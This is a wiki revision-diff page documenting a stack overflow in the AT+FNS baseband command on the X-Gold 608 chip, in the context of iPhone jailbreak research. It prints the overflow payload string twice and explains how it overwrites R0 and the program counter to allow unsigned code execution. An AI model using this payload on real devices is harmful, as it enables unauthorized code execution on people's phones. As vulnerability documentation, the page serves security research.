The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information.

Difference between revisions of "AT+FNS"

From The iPhone Wiki
Jump to: navigation, search
(added the crash command)
Line 1: Line 1:
 
== Credit ==
  
== Credit ==
 
[[User:Oranav|Oranav]]
  
[[User:Oranav|Oranav]]
  +
  +
==Exploit==
  +
There is a stack overflow in the AT+FNS=0,"..." command, which allows unsigned code execution on the [[X-Gold 608]]
  +
  +
AT+FNS="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  +
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  +
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  +
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  +
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  +
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  +
0000000000000000000000000000001111112222333344445555666677"
  +
  +
The exploit overwrites R0 and R2 on the stack, and R2 is copied to PC on exit from the routine. Therefore it can be used to overwrite R0 and PC.
   
 
== Description ==
  
== Description ==

Revision as of 17:26, 6 October 2010

Credit

Oranav

Exploit

There is a stack overflow in the AT+FNS=0,"..." command, which allows unsigned code execution on the X-Gold 608 

AT+FNS="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000001111112222333344445555666677"

The exploit overwrites R0 and R2 on the stack, and R2 is copied to PC on exit from the routine. Therefore it can be used to overwrite R0 and PC.

Description

Yet another buffer overflow in AT commands, like AT+XLOG and AT+stkprof. Leaked by NitroKey who somehow intercepted the information and pastied it with hashes shortly after Oranav had disclosed it to the iPhone Dev Team.

Retrieved from "https://www.theiphonewiki.com/w/index.php?title=AT%2BFNS&oldid=9970"